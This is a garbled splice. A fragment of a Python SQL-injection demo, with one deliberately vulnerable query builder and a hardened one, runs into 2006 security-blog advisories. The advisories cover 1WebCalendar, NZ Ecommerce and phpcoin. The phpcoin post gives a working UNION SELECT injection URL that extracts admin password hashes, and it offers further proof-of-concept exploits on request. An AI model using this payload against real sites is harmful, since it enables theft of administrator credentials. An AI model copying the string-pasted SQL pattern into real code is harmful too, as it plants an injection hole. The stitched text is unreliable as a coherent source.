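        CREATE TABLE transactions(id INTEGER PRIMARY KEY, advertiser_id INTEGER, amount REAL);
        INSERT INTO transactions VALUES (1, 7, 10.0), (2, 7, 20.0), (3, 7, 30.0), (4, 8, 99.0);
    """)
    return conn

def build_vulnerable_sql(advertiser_id, raw_offset):
    # Vulnerable pattern: the query-string value is pasted into the SQL text, so whatever
    # the client sends becomes part of the statement's grammar instead of a number.
    return ("SELECT id, amount FROM transactions WHERE advertiser_id = %d "
            "ORDER BY id LIMIT 10 OFFSET %s" % (advertiser_id, raw_offset))

def parse_offset(raw_offset):
    # Hardened step 1: accept only a short ASCII decimal string; anything else is
    # rejected before it gets near the database.
    if not isinstance(raw_offset, str) or not re.fullmatch(r"[0-9]{1,9}", raw_offset):
        raise ValueError("transactions_offset must be a non-negative integer")
    return int(raw_offset)

def is_valid_offset(raw_offset):
    # Convenience wrapper so callers (and tests) can check a value without catching.
    try:
        parse_offset(raw_offset)
        return True
    except ValueError:
        return False

def hardened_statement(conn, advertiser_id, raw_offset):
    # Hardened step 2: the SQL text is a constant; both values travel as bound parameters.
    sql = ("SELECT id, amount FROM transactions WHERE advertiser_id = ? "
           "ORDER BY id LIMIT 10 OFFSET ?")
    return conn.execute(sql, (advertiser_id, parse_offset(raw_offset))).fetchall()
```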

Wednesday, March 22, 2006

1WebCalendar v 4.x vuln.

##############################################
Vuln. discovered by : r0t
Date: 22 march 2006
vendor:www.bensonitsolutions.com/calendar/v4/
affected version: v4.0 and prior
##############################################

Vuln. desc.:

1WebCalendar contains a flaw that allows remote SQL injection attacks. Input passed to the "EventID", "NewsID" and "ThisDate" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

/viewEvent.cfm?EventID=[code]
/news/newsView.cfm?NewsID=[code]
/mainCal.cfm?=[code]

An attacker can also easily obtain the installation path just by testing these holes.
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Friday, March 17, 2006

phpcoin p.o.c.

This is for the phpcoin public vulnerability.

/phpcoin/mod.php?mod=pages&mode=list&dtopic_id=88888%20and%201=0%20union%20select%201222,admin_user_pword,322,224,225,226,227,228,229,2211,2212,2221%20from%20phpcoin_admins/*

There was no proof of concept included in the original posting (by whoever it was that discovered it).

To request p.o.c. exploits join the forum at:
http://www.unsecured-systems.com/forum/

(we will only give p.o.c. exploits for public vulnerabilities)

Thursday, March 02, 2006

NZ Ecommerce SQL&XSS vuln.

Vuln. discovered by : r0t
Date: 2 march 2006
vendor: www.digitalbuilder.co.nz/Product_Code_NZEcommerce.asp
affected version: latest



1.XSS

Input passed to the "action" parameter in "index.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


2. SQL

NZ Ecommerce contains a flaw that allows remote SQL injection attacks. Input passed to the "informationID" and "ParentCategory" parameters in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


POC.

/index.php?action=Information&informationID=[SQL]
/index.php?action=DisplayOverviewproduct&ParentCategory=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

 
Copyright (c) 2006 Pridels Sec Crew